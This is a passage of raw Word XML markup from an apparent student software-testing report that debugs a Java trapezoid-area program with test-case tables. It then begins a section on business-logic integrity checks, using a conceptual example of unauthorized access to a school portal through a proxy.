          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> code </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4A4FEBDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>looks to</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="616AB4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C6EB9B" w:rsidR="616AB43C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">be the hardest of all. However, there are some hints on what </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="594F1C21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the error may be. Despite the variable “area” having been initialized as a double, Eclipse still </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="594F1C21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indicates</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="594F1C21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that it has not been used, as seen in the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="70DFDD87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>screenshot below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70DFDD87" w:rsidP="7CC6EB9B" w:rsidRDefault="70DFDD87" w14:paraId="6430A7E0" w14:textId="1522D4C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70DFDD87">
        <w:drawing>
          <wp:inline wp14:editId="4C335F27" wp14:anchorId="7F81D417">
            <wp:extent cx="4724641" cy="2387723"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93963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fcc04c997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FDD87" w:rsidP="7CC6EB9B" w:rsidRDefault="70DFDD87" w14:paraId="7D684F2E" w14:textId="456A68A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70DFDD87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 18: Original position of “area” variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4834F401" w:rsidP="7CC6EB9B" w:rsidRDefault="4834F401" w14:paraId="473D0847" w14:textId="53AF6B4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834F401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Perhaps removing the “area” variable from the top of the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4834F401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>code, and</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4834F401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> initializing it w</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4D7C1A83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>here it is set to equal the formula, will fix the error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="227E1956" w:rsidP="7CC6EB9B" w:rsidRDefault="227E1956" w14:paraId="71FB3D9B" w14:textId="6BDD0E3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227E1956">
        <w:drawing>
          <wp:inline wp14:editId="0D6D55DA" wp14:anchorId="6B3D10ED">
            <wp:extent cx="4925434" cy="2233811"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37681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e2c943179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34" cy="22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E1956" w:rsidP="7CC6EB9B" w:rsidRDefault="227E1956" w14:paraId="16C57862" w14:textId="5FB9DAA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27E1956">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 19: Rearranged “area” variable in Code E.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="227E1956" w:rsidP="7CC6EB9B" w:rsidRDefault="227E1956" w14:paraId="6515F405" w14:textId="6297B9C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227E1956">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The rearrangement of the “area” variable did not influence the program in any way. However, there is one last thing </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="227E1956">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>remaining</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="227E1956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CC6EB9B" w:rsidR="7E3CC4FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do, to really use the variable, and test the program. And that is, creating a “</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7E3CC4FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7E3CC4FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” statement with the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5D8F3796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value of the area in it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A8A4971" w:rsidP="7CC6EB9B" w:rsidRDefault="4A8A4971" w14:paraId="695ED3DA" w14:textId="3B67220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A8A4971">
        <w:drawing>
          <wp:inline wp14:editId="314E4C3A" wp14:anchorId="5D14217B">
            <wp:extent cx="4464311" cy="2343485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23889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6c0a9549a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11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14074" w:rsidP="7CC6EB9B" w:rsidRDefault="64D14074" w14:paraId="318870B1" w14:textId="6FB6292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4D14074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 20: Adding a “</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="64D14074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="64D14074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” statement to display the area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09E1B4EE">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="35629F1C" w14:textId="31BE31F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872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="53590244" w14:textId="05FF574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50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="3F062ADB" w14:textId="20F7C89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Expected Result: </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="7D893CDC" w14:textId="6CEE122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Actual Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="2D20DEE0" w14:textId="7A2BC25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32B701D6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2A9F97F5" w14:textId="75A7CFDD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50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="33BC914F" w14:textId="747C1A5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Base1= 2.3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="18B579E0" w14:textId="15CCCF9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Base2: 4.8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="50F0DFD5" w:rsidP="7CC6EB9B" w:rsidRDefault="50F0DFD5" w14:paraId="55F333A4" w14:textId="6BDAE91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50F0DFD5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Height: 12.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="4F6D4290" w:rsidP="7CC6EB9B" w:rsidRDefault="4F6D4290" w14:paraId="3D03C585" w14:textId="564C171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F6D4290">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>44.38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="4F6D4290" w:rsidP="7CC6EB9B" w:rsidRDefault="4F6D4290" w14:paraId="61250813" w14:textId="22C6B5C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F6D4290">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>32.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="4F6D4290" w:rsidP="7CC6EB9B" w:rsidRDefault="4F6D4290" w14:paraId="0365F1BF" w14:textId="109E6E0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4F6D4290">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="728B7BF6" w14:textId="2C61566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F6D4290" w:rsidP="7CC6EB9B" w:rsidRDefault="4F6D4290" w14:paraId="7BA36D1E" w14:textId="66CFF7B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4F6D4290">
        <w:drawing>
          <wp:inline wp14:editId="65EF958F" wp14:anchorId="52FA4B13">
            <wp:extent cx="3721369" cy="3429852"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40119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14cc072a0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69" cy="34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D4290" w:rsidP="7CC6EB9B" w:rsidRDefault="4F6D4290" w14:paraId="743D7D57" w14:textId="06417F7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F6D4290">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 21: Code E Test Case 1 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F6D4290" w:rsidP="7CC6EB9B" w:rsidRDefault="4F6D4290" w14:paraId="51409CDB" w14:textId="1B3C97C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4F6D4290">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The test case failed due to a mistake in the order of operations. The program first divided th</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="531DA357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e second base by 2, multiplied it by the height, and then added it to the first base. To get the correct result, it needs to add the two bases firs</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="11C28889">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t. This mistake can be fixed by putting parentheses around the bases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="6DDEC5D2" w14:textId="607D0AE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3B7EA8D7">
        <w:drawing>
          <wp:inline wp14:editId="742E6282" wp14:anchorId="048D8ABD">
            <wp:extent cx="4591318" cy="2250645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179181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c6d196c1f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318" cy="22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EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="08D26606" w14:textId="2DADEA9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B7EA8D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 22: Code E with parentheses around the bases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="4B8B200F" w14:textId="2E629DC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B7EA8D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now that this addition has been made, we can retest the program.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CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="4ED78A4C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="76C8267E" w14:textId="08B51B6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1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="50E87D61" w14:textId="3FBFAE7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1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="0BA25CE4" w14:textId="33E9DF1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Output:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="076226DB" w14:textId="6EAA3C5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Actual Output:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="40EA7098" w14:textId="6AEF26A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Pass/Fail:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="07041EE0">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="03BC0F89" w14:textId="7EA8BCF4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3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="4202FECE" w14:textId="4834CEC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Base1= 2.3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="008529F7" w14:textId="0521E76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Base2= 4.8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="3B7EA8D7" w:rsidP="7CC6EB9B" w:rsidRDefault="3B7EA8D7" w14:paraId="7577076C" w14:textId="3A0421C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B7EA8D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Height=12.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="3F2F099E" w:rsidP="7CC6EB9B" w:rsidRDefault="3F2F099E" w14:paraId="3704D784" w14:textId="021AFB7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F2F099E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>44.38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="32C8C8F4" w:rsidP="7CC6EB9B" w:rsidRDefault="32C8C8F4" w14:paraId="4F4BE01A" w14:textId="0D2B73A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2C8C8F4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>44.375</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="32C8C8F4" w:rsidP="7CC6EB9B" w:rsidRDefault="32C8C8F4" w14:paraId="775E491E" w14:textId="5C66167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CC6EB9B" w:rsidR="32C8C8F4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pass (Result rounded).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="28824A2C" w14:textId="0CB2919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2C8C8F4" w:rsidP="7CC6EB9B" w:rsidRDefault="32C8C8F4" w14:paraId="19A6D409" w14:textId="665AF0D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32C8C8F4">
        <w:drawing>
          <wp:inline wp14:editId="252915FF" wp14:anchorId="37A97809">
            <wp:extent cx="4143611" cy="3213954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75901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ef62a601b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11" cy="32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8C8F4" w:rsidP="7CC6EB9B" w:rsidRDefault="32C8C8F4" w14:paraId="04A8694A" w14:textId="010D8DF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2C8C8F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 23: Code E Test Case 2 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32C8C8F4" w:rsidP="7CC6EB9B" w:rsidRDefault="32C8C8F4" w14:paraId="0DD8A632" w14:textId="71246E9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32C8C8F4"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 w:rsidRPr="7CC6EB9B" w:rsidR="3E94C1D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adding the parentheses, the program finally made the correct calculation, which the online calculator rounded to 4.38.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7741D94D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thus, corrections have been made to all pieces of code, and all test </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5C8C19A0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cases have been passed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C8C19A0" w:rsidP="7CC6EB9B" w:rsidRDefault="5C8C19A0" w14:paraId="7730459A" w14:textId="1B6FE78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C6EB9B" w:rsidR="5C8C19A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Integrity Checks (OTG-BUSLOGIC-003</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67D3E0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67D3E060" w:rsidP="7CC6EB9B" w:rsidRDefault="67D3E060" w14:paraId="3EC97C9F" w14:textId="138A745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7873C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Testing integrity checks is an extremely important process </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="14ABAB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application. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5779C6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According to </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5779C6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GeeksForGeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5779C6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integrity testing is </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519762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“a process in which data is verified in the database whether it is accurate and functions as per requirements.” (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="14C9E3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2023</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519762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). These tests are performed very </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519762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frequently</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="519762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CC6EB9B" w:rsidR="69282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it needs to be ensured that data in files </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69282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remains</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="692824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unchanged</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4EE12D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r w:rsidRPr="7CC6EB9B" w:rsidR="4EE12D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GeeksForGeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4EE12D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n.d.). The</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6C5452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 also check that data is compatible with </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6C5452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previous</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6C5452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versions of the software, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="14CC58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whether it has been successfully saved, whether it has been tampered with, and whether it can be retrieved from the database (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="14CC58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Geek</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67D5D0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sForGeeks</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67D5D0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7CC6EB9B" w:rsidR="2E8400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2023</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67D5D0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). Below are two written (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="267AB5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non-code) </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="67D5D0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examples of integrity checks, along with methods to test for them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03D2F188" w:rsidP="7CC6EB9B" w:rsidRDefault="03D2F188" w14:paraId="32F188DE" w14:textId="796DAF28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03D2F18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Example 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03D2F188" w:rsidP="7CC6EB9B" w:rsidRDefault="03D2F188" w14:paraId="31653FDE" w14:textId="7D58697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C6EB9B" w:rsidR="01EFE3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Let us suppose that an online portal at a school allows students and </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3DECCB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faculty to access information. The application, however, has privileges in place, which means that not everyone has access</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7048B6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the same information. The portal has dropdown menus, which allow faculty to access </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4F9B28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different sections of a student’s profile. Because of the privileges, some sections are restricted to ce</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0E400E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rtain people. For example, only those working at the Financial Aid Office and Tuition Planning can </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="73F91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see a student’s “Financials” section in </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76A113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dropdown menu. However, an attacker (who could even be an unrelated faculty member or student), could access the sect</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="418EF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ion through a proxy. Then, they could </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="418EF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modify</w:t>
      </w:r>
